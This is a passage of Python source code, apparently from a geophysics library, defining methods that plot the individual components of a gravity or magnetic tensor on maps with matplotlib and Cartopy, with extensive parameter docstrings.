cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxy_label
return self.vxy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vyx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyx component of the tensor.
Usage
-----
x.plot_vyx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyx_label
return self.vyx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vxz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vxz component of the tensor.
Usage
-----
x.plot_vxz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{xz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vxz_label
return self.vxz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzx(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzx component of the tensor.
Usage
-----
x.plot_vzx([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zx}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzx_label
return self.vzx.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vyz(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vyz component of the tensor.
Usage
-----
x.plot_vyz([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{yz}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vyz_label
return self.vyz.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_vzy(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the Vzy component of the tensor.
Usage
-----
x.plot_vzy([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzy_label
return self.vzy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot(self, projection=None, tick_interval=[90, 90],
minor_tick_interval=[30, 30], xlabel='', ylabel='',
colorbar='bottom', cmap='viridis', cmap_limits=None,
cmap_reverse=False, cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=8,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the 9 components of the tensor.
Usage
-----
x.plot([projection, tick_interval, minor_tick_interval, ticks, xlabel,
ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [90, 90]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 8
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if colorbar is not None:
if colorbar in ('bottom', 'top'):
scale = 0.9
else:
scale = 0.45
else:
scale = 0.55
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
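# Note: a new 3 x 3 figure is always created here, so any user-supplied
# `ax` argument is ignored and rebound below.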
fig, ax = _plt.subplots(3, 3, figsize=figsize)
self.plot_vxx(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vxy(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vxz(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyx(projection=projection, ax=ax.flat[3],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyy(projection=projection, ax=ax.flat[4],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyz(projection=projection, ax=ax.flat[5],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzx(projection=projection, ax=ax.flat[6],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzy(projection=projection, ax=ax.flat[7],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzz(projection=projection, ax=ax.flat[8],
tick_interval=tick_interval,
